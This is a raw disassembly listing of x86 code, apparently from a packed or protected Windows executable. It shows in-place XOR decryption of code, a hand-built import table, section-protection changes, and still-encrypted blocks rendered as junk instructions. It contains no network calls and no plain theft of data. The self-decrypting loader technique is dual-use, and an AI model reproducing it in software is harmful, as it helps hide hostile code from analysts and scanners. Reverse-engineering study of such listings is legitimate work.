mov [ebp-2Ch], ecx
cmp dword ptr [ebp-2Ch], 0
jz short locret_4D47AD
mov edx, [ebp-2Ch]
add edx, 10h
push edx
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D47AD: ; CODE XREF: sub_4D4791+D�j
retn
sub_4D4791 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D46D0
loc_4D47AE: ; CODE XREF: sub_4D46D0+53�j
; sub_4D46D0+BF�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D46D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D47BF proc near ; CODE XREF: sub_4D489D+C�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D488E SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE450
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
mov eax, offset dword_4CD720
push dword ptr [eax+4]
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_24], eax
mov eax, [ebp+var_30]
mov eax, [eax-4]
mov [ebp+var_2C], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_24]
shr eax, 10h
mov ecx, [ebp+var_2C]
add ecx, eax
mov [ebp+var_28], ecx
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
jmp short loc_4D483A
; ---------------------------------------------------------------------------
loc_4D4833: ; CODE XREF: sub_4D47BF+9D�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4D483A: ; CODE XREF: sub_4D47BF+72�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jz short loc_4D485E
mov eax, [ebp+var_1C]
imul eax, 19660Dh
add eax, 3C6EF35Fh
mov ecx, [ebp+var_1C]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+var_1C]
mov [eax], cl
jmp short loc_4D4833
; ---------------------------------------------------------------------------
loc_4D485E: ; CODE XREF: sub_4D47BF+81�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
push eax
push [ebp+var_20]
push ds:dword_4E168C
call ds:dword_4E1670 ; FlushInstructionCache
or [ebp+var_4], 0FFFFFFFFh
call sub_4D487F
jmp short loc_4D488E
sub_4D47BF endp
; =============== S U B R O U T I N E =======================================
sub_4D487F proc near ; CODE XREF: sub_4D47BF+B9�p
; DATA XREF: _5:004DE458�o
mov eax, offset dword_4CD720
push dword ptr [eax+4]
call ds:dword_4E1754 ; RtlLeaveCriticalSection
retn
sub_4D487F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D47BF
loc_4D488E: ; CODE XREF: sub_4D47BF+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D47BF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D489D proc near ; CODE XREF: sub_4CDB7E�j
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
pusha
xor edx, edx
lea ecx, [ebp+arg_0]
call sub_4D47BF
popa
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_4D489D endp
; ---------------------------------------------------------------------------
loc_4D48B6: ; CODE XREF: _4:004CDB83�j _4:004CDB88�j
mov ecx, 0EF000008h
call sub_4D8342
loc_4D48C0: ; CODE XREF: sub_4D4DC0+12A�p
push ebp
mov ebp, esp
sub esp, 0F8h
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 0
jz loc_4D498A
push 300000h
call sub_4CDB7E
das
pop esp
jmp far ptr 0ACF4h:78C07626h
; ---------------------------------------------------------------------------
db 79h, 51h, 0C5h
dd 0D3767C0Eh, 9A3C1583h, 61222F3Ch, 569A14B2h, 51ACF93Bh
dd 795DE1D6h, 8AC55F6Ch, 6E1F4C7h, 0DDEA9A95h, 847AACBFh
dd 6408A2E6h, 0F0A72036h, 0DEAD53CBh, 0D9318176h, 7A25BFCCh
dd 66815367h, 3D4A3AD5h, 24DA4C5Fh, 0C468C286h, 0A179C1BCh
dd 52068794h, 4B34FCBFh, 5121FE3h, 0D1F96FEFh, 627220C4h
dd 0B1617C44h, 5A424F31h, 7B38D747h, 0B9CB6DC2h, 99A668AAh
dd 1F06D28Ch, 313E4B8Bh, 3278658Bh, 0DED6E3F0h, 95A2B3C9h
dd 9E91AF1Fh, 433950ABh, 90901320h, 0C985C933h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_4D498A: ; CODE XREF: _4:004D48D0�j
cmp dword ptr [ebp+8], 0
jz loc_4D4A9D
mov dword ptr [ebp-0E4h], 0
push 5F0000h
call sub_4CDB7E
ja short loc_4D4A0E
xor bl, ah
sahf
cli
inc eax
lodsb
les ebx, [ecx] ; CODE XREF: _4:004D49B2�j
jns short near ptr loc_4D49B0+1
into
test [esi+5C4DBBE2h], bl
; ---------------------------------------------------------------------------
db 0FEh
; ---------------------------------------------------------------------------
adc al, 7
cli
cdq
mov cl, [esi+eax*8]
mov ecx, 0F36FEBACh
add cl, [esi+ebx*2+58434451h]
retn 310h
; ---------------------------------------------------------------------------
dw 9DF6h
dd 0DFB43472h, 818E9B43h, 4DB11D00h, 0E893340h, 1A0D3981h
dd 0C745F0A4h, 7D8A64DEh, 0BA241770h, 63222F3Ch, 0E1EE187Ah
dd 521A50D4h, 0F1916C2Ch, 2A525F02h, 6B33E757h
db 29h
byte_4D4A0D db 7Dh ; CODE XREF: _4:004D4A36�j
; ---------------------------------------------------------------------------
loc_4D4A0E: ; CODE XREF: _4:004D49A8�j
sti
test eax, 0A9B628A2h
pushf
loc_4D4A15: ; CODE XREF: _4:004D4A20�j
sti
enter 68AAh, 5Bh
dec esi
cmp eax, 4F6ED00Dh
jecxz short loc_4D4A15
out 0D9h, al
mov eax, 65B38C81h
loc_4D4A29: ; CODE XREF: _4:004D4A49�j
xchg esp, ds:0C1542B53h[eax]
cmp al, 78h
bound edi, [ebx+1Bh]
out dx, eax
loop near ptr byte_4D4A0D
mov esi, 94A141C9h
xchg ecx, [esi]
pop es
mov edx, [ebx+46h]
cmp [ecx-7199795h], eax
jmp short loc_4D4A29
; ---------------------------------------------------------------------------
db 7Eh
dd 9D45C5B6h, 1DD88390h, 35429036h, 6A19B628h, 0B1251884h
dd 0A6DC5CFBh, 76E58A07h, 26C1FAACh, 2F5D25Ch, 36296F67h
dd 0FB59B843h, 90907B88h, 0C085C033h, 8D8BEE75h, 0FFFFFF1Ch
dd 0FF088D89h, 958BFFFFh, 0FFFFFF08h, 3943E852h, 0C4830000h
db 4
; ---------------------------------------------------------------------------
loc_4D4A9D: ; CODE XREF: _4:004D498E�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4AB0 proc near ; CODE XREF: sub_4D4D70+29�p
; sub_4D4DC0+234�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_4], 1
mov [ebp+var_8], 0
jmp short loc_4D4ACC
; ---------------------------------------------------------------------------
loc_4D4AC3: ; CODE XREF: sub_4D4AB0+106�j
; sub_4D4AB0+2A8�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4D4ACC: ; CODE XREF: sub_4D4AB0+11�j
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx+0Ch], 0
jnz short loc_4D4AE1
jmp loc_4D4D5D
; ---------------------------------------------------------------------------
loc_4D4AE1: ; CODE XREF: sub_4D4AB0+2A�j
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax+10h]
mov [ebp+var_20], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
cmp ecx, [eax+34h]
jnz short loc_4D4B19
mov edx, [ebp+var_20]
mov [ebp+var_C], edx
jmp short loc_4D4B27
; ---------------------------------------------------------------------------
loc_4D4B19: ; CODE XREF: sub_4D4AB0+5F�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnz short loc_4D4B27
mov ecx, [ebp+var_20]
mov [ebp+var_C], ecx
loc_4D4B27: ; CODE XREF: sub_4D4AB0+67�j
; sub_4D4AB0+6F�j
mov [ebp+var_14], 0
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+edx+0Ch]
mov [ebp+var_24], ecx
cmp [ebp+arg_14], 0
jz short loc_4D4B5A
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_4D575D
add esp, 8
mov [ebp+var_14], eax
loc_4D4B5A: ; CODE XREF: sub_4D4AB0+95�j
cmp [ebp+var_14], 0
jnz short loc_4D4B6C
mov ecx, [ebp+var_24]
push ecx
call sub_4DAF8C
mov [ebp+var_14], eax
loc_4D4B6C: ; CODE XREF: sub_4D4AB0+AE�j
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp dword ptr [eax+edx+4], 0FFFFFFFEh
setnz cl
mov byte ptr [ebp+var_1C], cl
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx+4], 0
jnz short loc_4D4B9F
mov ecx, [ebp+var_1C]
and ecx, 0FFh
test ecx, ecx
jz short loc_4D4BDD
loc_4D4B9F: ; CODE XREF: sub_4D4AB0+E0�j
mov edx, [ebp+arg_10]
and edx, 0FFh
test edx, edx
jz short loc_4D4BBD
cmp [ebp+var_14], 0
jnz short loc_4D4BBB
mov [ebp+var_4], 0
jmp loc_4D4AC3
; ---------------------------------------------------------------------------
loc_4D4BBB: ; CODE XREF: sub_4D4AB0+100�j
jmp short loc_4D4BDD
; ---------------------------------------------------------------------------
loc_4D4BBD: ; CODE XREF: sub_4D4AB0+FA�j
mov eax, [ebp+var_24]
push eax
call sub_4DAE83
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4D4BDD
mov ecx, [ebp+var_24]
push ecx
push offset aTheDynamicLink ; "The dynamic link library '%s' could not"...
call sub_4D84F7
loc_4D4BDD: ; CODE XREF: sub_4D4AB0+ED�j
; sub_4D4AB0:loc_4D4BBB�j ...
mov edx, ds:off_4E0BE8
mov [ebp+var_18], edx
mov eax, [ebp+arg_C]
mov ds:off_4E0BE8, eax
push 0
call ds:dword_4E1718 ; GetModuleHandleA
cmp eax, [ebp+arg_4]
jnz short loc_4D4C62
mov [ebp+var_34], offset aExecutable ; "EXECUTABLE"
mov ecx, [ebp+arg_C]
mov [ebp+var_38], ecx
loc_4D4C08: ; CODE XREF: sub_4D4AB0+18A�j
mov edx, [ebp+var_38]
mov al, [edx]
mov [ebp+var_39], al
mov ecx, [ebp+var_34]
cmp al, [ecx]
jnz short loc_4D4C45
cmp [ebp+var_39], 0
jz short loc_4D4C3C
mov edx, [ebp+var_38]
mov al, [edx+1]
mov [ebp+var_3A], al
mov ecx, [ebp+var_34]
cmp al, [ecx+1]
jnz short loc_4D4C45
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_4D4C08
loc_4D4C3C: ; CODE XREF: sub_4D4AB0+16B�j
mov [ebp+var_40], 0
jmp short loc_4D4C4D
; ---------------------------------------------------------------------------
loc_4D4C45: ; CODE XREF: sub_4D4AB0+165�j
; sub_4D4AB0+17C�j
sbb edx, edx
sbb edx, 0FFFFFFFFh
mov [ebp+var_40], edx
loc_4D4C4D: ; CODE XREF: sub_4D4AB0+193�j
mov eax, [ebp+var_40]
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_4D4C62
mov [ebp+var_48], 0
jmp short loc_4D4C69
; ---------------------------------------------------------------------------
loc_4D4C62: ; CODE XREF: sub_4D4AB0+149�j
; sub_4D4AB0+1A7�j
mov [ebp+var_48], 1
loc_4D4C69: ; CODE XREF: sub_4D4AB0+1B0�j
mov cl, byte ptr [ebp+var_48]
mov byte ptr [ebp+var_10], cl
jmp short loc_4D4C83
; ---------------------------------------------------------------------------
loc_4D4C71: ; CODE XREF: sub_4D4AB0:loc_4D4D3A�j
mov edx, [ebp+var_20]
add edx, 4
mov [ebp+var_20], edx
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
loc_4D4C83: ; CODE XREF: sub_4D4AB0+1BF�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx], 0
jz loc_4D4D3F
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_4D4D3F
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax+4], 0
jnz short loc_4D4CB8
mov edx, [ebp+var_1C]
and edx, 0FFh
test edx, edx
jz short loc_4D4D16
loc_4D4CB8: ; CODE XREF: sub_4D4AB0+1F9�j
mov eax, [ebp+var_C]
mov ecx, [eax]
and ecx, 80000000h
test ecx, ecx
jnz short loc_4D4CEA
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
add ecx, 2
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4E1728 ; GetProcAddress
mov ecx, [ebp+var_20]
mov [ecx], eax
jmp short loc_4D4D16
; ---------------------------------------------------------------------------
loc_4D4CEA: ; CODE XREF: sub_4D4AB0+215�j
mov edx, [ebp+var_C]
mov eax, [edx]
and eax, 0FFFFh
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D4D16
mov eax, [ebp+var_20]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_4D4D16: ; CODE XREF: sub_4D4AB0+206�j
; sub_4D4AB0+238�j ...
mov edx, [ebp+var_10]
and edx, 0FFh
test edx, edx
jz short loc_4D4D3A
mov eax, [ebp+var_24]
push eax
mov ecx, ds:off_4E0BE8
push ecx
mov edx, [ebp+var_20]
push edx
call sub_4D53D0
add esp, 0Ch
loc_4D4D3A: ; CODE XREF: sub_4D4AB0+271�j
jmp loc_4D4C71
; ---------------------------------------------------------------------------
loc_4D4D3F: ; CODE XREF: sub_4D4AB0+1D9�j
; sub_4D4AB0+1E5�j
mov eax, [ebp+var_18]
mov ds:off_4E0BE8, eax
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx+4], 0FFFFFFFEh
jmp loc_4D4AC3
; ---------------------------------------------------------------------------
loc_4D4D5D: ; CODE XREF: sub_4D4AB0+2C�j
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4D4AB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4D70 proc near ; CODE XREF: sub_4D5BD7+1B8�p
; sub_4D614D+45�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4E1914
add eax, 1
mov ds:dword_4E1914, eax
mov ecx, [ebp+arg_14]
push ecx
mov dl, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4D4AB0
add esp, 18h
mov [ebp+var_4], al
mov ecx, ds:dword_4E1914
sub ecx, 1
mov ds:dword_4E1914, ecx
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4D4D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4DC0 proc near ; CODE XREF: _4:004CE2A6�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
mov [ebp+var_18], 0
call sub_4D2DD0
call sub_4D9DD4
call sub_4CC3F3
mov eax, ds:dword_4E1684
mov ecx, [eax+4]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_18]
add eax, [edx+3Ch]
mov ds:dword_4E1910, eax
mov ecx, ds:dword_4E1910
cmp dword ptr [ecx], 4550h
jz short loc_4D4E0D
mov ecx, 0EF000002h
call sub_4D8342
loc_4D4E0D: ; CODE XREF: sub_4D4DC0+41�j
mov edx, ds:dword_4E1698
sub edx, 3
mov [ebp+var_4], edx
cmp ds:dword_4E1680, 1
jz short loc_4D4E37
lea eax, [ebp+var_8]
push eax
push 4
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4E17AC ; VirtualProtect
loc_4D4E37: ; CODE XREF: sub_4D4DC0+60�j
mov [ebp+var_14], 0
jmp short loc_4D4E49
; ---------------------------------------------------------------------------
loc_4D4E40: ; CODE XREF: sub_4D4DC0+AF�j
; sub_4D4DC0:loc_4D4F6D�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_4D4E49: ; CODE XREF: sub_4D4DC0+7E�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jnb loc_4D4F72
mov ecx, [ebp+var_14]
imul ecx, 28h
mov edx, ds:off_4E169C
add edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4D4E71
jmp short loc_4D4E40
; ---------------------------------------------------------------------------
loc_4D4E71: ; CODE XREF: sub_4D4DC0+AD�j
cmp [ebp+var_14], 20h
jnb short loc_4D4E98
mov edx, 1
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, ds:dword_4E1684
mov ecx, [eax+10h]
and ecx, edx
test ecx, ecx
jz short loc_4D4E98
mov [ebp+var_34], 1
jmp short loc_4D4E9F
; ---------------------------------------------------------------------------
loc_4D4E98: ; CODE XREF: sub_4D4DC0+B5�j
; sub_4D4DC0+CD�j
mov [ebp+var_34], 0
loc_4D4E9F: ; CODE XREF: sub_4D4DC0+D6�j
mov edx, [ebp+var_34]
mov [ebp+var_28], edx
cmp [ebp+var_14], 20h
jnb short loc_4D4ECD
mov eax, 1
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, ds:dword_4E1684
mov edx, [ecx+14h]
and edx, eax
test edx, edx
jz short loc_4D4ECD
mov [ebp+var_38], 1
jmp short loc_4D4ED4
; ---------------------------------------------------------------------------
loc_4D4ECD: ; CODE XREF: sub_4D4DC0+E9�j
; sub_4D4DC0+102�j
mov [ebp+var_38], 0
loc_4D4ED4: ; CODE XREF: sub_4D4DC0+10B�j
mov eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_28]
push ecx
call loc_4D48C0
mov edx, [ebp+var_20]
mov eax, [edx+24h]
and eax, 20000000h
test eax, eax
jz short loc_4D4F19
mov ecx, [ebp+var_20]
mov edx, [ecx+24h]
and edx, 80000000h
neg edx
sbb edx, edx
and edx, 20h
add edx, 20h
mov [ebp+var_3C], edx
jmp short loc_4D4F32
; ---------------------------------------------------------------------------
loc_4D4F19: ; CODE XREF: sub_4D4DC0+13C�j
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 2
mov [ebp+var_3C], ecx
loc_4D4F32: ; CODE XREF: sub_4D4DC0+157�j
mov edx, [ebp+var_3C]
mov [ebp+var_24], edx
cmp ds:dword_4E1680, 1
jz short loc_4D4F6D
mov eax, ds:dword_4E1910
xor ecx, ecx
mov cx, [eax+14h]
mov edx, ds:dword_4E1910
lea eax, [edx+ecx+18h]
mov ecx, [ebp+var_14]
imul ecx, 28h
add eax, ecx
mov [ebp+var_30], eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
mov [edx+24h], ecx
loc_4D4F6D: ; CODE XREF: sub_4D4DC0+17F�j
jmp loc_4D4E40
; ---------------------------------------------------------------------------
loc_4D4F72: ; CODE XREF: sub_4D4DC0+8F�j
cmp ds:dword_4E1680, 1
jz short loc_4D4FA3
mov edx, ds:dword_4E1910
mov eax, ds:off_4E169C
mov ecx, [eax-0Ch]
mov [edx+0ECh], ecx
mov edx, ds:dword_4E1910
mov eax, ds:off_4E169C
mov ecx, [eax-8]
mov [edx+0E8h], ecx
loc_4D4FA3: ; CODE XREF: sub_4D4DC0+1B9�j
cmp ds:dword_4E1680, 1
jz short loc_4D4FC3
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_8]
push eax
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4E17AC ; VirtualProtect
loc_4D4FC3: ; CODE XREF: sub_4D4DC0+1EA�j
mov edx, ds:dword_4E1684
mov eax, [ebp+var_18]
add eax, [edx+8]
mov [ebp+var_C], eax
mov ds:dword_4E1914, 0
push 0
push 0
push offset aExecutable ; "EXECUTABLE"
mov ecx, ds:dword_4E1910
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_4D4AB0
add esp, 18h
call sub_4D613C
and eax, 0FFh
test eax, eax
jz short loc_4D501F
loc_4D500A: ; CODE XREF: sub_4D4DC0+258�j
call sub_4D614D
and eax, 0FFh
test eax, eax
jz short loc_4D501A
jmp short loc_4D500A
; ---------------------------------------------------------------------------
loc_4D501A: ; CODE XREF: sub_4D4DC0+256�j
call sub_4D613C
loc_4D501F: ; CODE XREF: sub_4D4DC0+248�j
push offset aImm32_dll ; "imm32.dll"
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D5041
push offset aImm32_dll ; "imm32.dll"
mov ecx, [ebp+var_1C]
push ecx
call sub_4D5070
loc_4D5041: ; CODE XREF: sub_4D4DC0+271�j
push offset aOleoaut32_dll ; "oleoaut32.dll"
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4D5063
push offset aOleaout32_dll ; "oleaout32.dll"
mov edx, [ebp+var_10]
push edx
call sub_4D5070
loc_4D5063: ; CODE XREF: sub_4D4DC0+293�j
mov esp, ebp
pop ebp
retn
sub_4D4DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5070 proc near ; CODE XREF: sub_4D4DC0+27C�p
; sub_4D4DC0+29E�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_4E1914
add eax, 1
mov ds:dword_4E1914, eax
mov ecx, [ebp+arg_4]
mov ds:off_4E0BE8, ecx
push 9
lea ecx, [ebp+var_28]
call sub_4DB77C
lea edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
call sub_4D50D0
add esp, 0Ch
mov ecx, ds:dword_4E1914
sub ecx, 1
mov ds:dword_4E1914, ecx
mov [ebp+var_2C], 1
lea ecx, [ebp+var_28]
call sub_4DB82A
mov eax, [ebp+var_2C]
mov esp, ebp
pop ebp
retn 8
sub_4D5070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D50D0 proc near ; CODE XREF: sub_4D5070+30�p
; sub_4D50D0+24B�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE460
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jnz short loc_4D5101
jmp loc_4D53BC
; ---------------------------------------------------------------------------
loc_4D5101: ; CODE XREF: sub_4D50D0+2A�j
mov eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_30], edx
jmp short loc_4D511E
; ---------------------------------------------------------------------------
loc_4D5115: ; CODE XREF: sub_4D50D0:loc_4D5133�j
mov eax, [ebp+var_30]
mov ecx, [eax+4]
mov [ebp+var_30], ecx
loc_4D511E: ; CODE XREF: sub_4D50D0+43�j
cmp [ebp+var_30], 0
jz short loc_4D5135
mov edx, [ebp+var_30]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jnz short loc_4D5133
jmp loc_4D53BC
; ---------------------------------------------------------------------------
loc_4D5133: ; CODE XREF: sub_4D50D0+5C�j
jmp short loc_4D5115
; ---------------------------------------------------------------------------
loc_4D5135: ; CODE XREF: sub_4D50D0+52�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_4DB871
test eax, eax
jz short loc_4D514A
jmp loc_4D53BC
; ---------------------------------------------------------------------------
loc_4D514A: ; CODE XREF: sub_4D50D0+73�j
mov edx, ds:dword_4E1914
add edx, 1
mov ds:dword_4E1914, edx
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov ecx, ds:off_4E0BE8
mov [ebp+var_24], ecx
mov [ebp+var_4], 0
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
add eax, [edx+3Ch]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
cmp dword ptr [ecx], 4550h
jnz loc_4D5371
cmp ds:dword_4E1680, 1
jnz short loc_4D51AA
cmp [ebp+arg_0], 80000000h
jbe short loc_4D51AA
push 0
push 0
push 0
push 0
call ds:dword_4E1778 ; RaiseException
loc_4D51AA: ; CODE XREF: sub_4D50D0+C1�j
; sub_4D50D0+CA�j
mov edx, [ebp+var_38]
mov eax, [ebp+var_34]
add eax, [edx+80h]
mov [ebp+var_20], eax
mov [ebp+var_4], 1
cmp ds:dword_4E1680, 1
jnz short loc_4D5247
mov [ebp+var_40], 0
jmp short loc_4D51DB
; ---------------------------------------------------------------------------
loc_4D51D2: ; CODE XREF: sub_4D50D0:loc_4D5245�j
mov ecx, [ebp+var_40]
add ecx, 1
mov [ebp+var_40], ecx
loc_4D51DB: ; CODE XREF: sub_4D50D0+100�j
mov edx, [ebp+var_38]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_40], eax
jnb short loc_4D5247
mov ecx, [ebp+var_38]
xor edx, edx
mov dx, [ecx+14h]
mov eax, [ebp+var_38]
lea ecx, [eax+edx+18h]
mov edx, [ebp+var_40]
imul edx, 28h
add ecx, edx
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+var_34]
add ecx, [eax+0Ch]
cmp ecx, [ebp+var_20]
ja short loc_4D5245
mov edx, [ebp+var_44]
mov eax, [ebp+var_34]
add eax, [edx+0Ch]
mov ecx, [ebp+var_44]
add eax, [ecx+8]
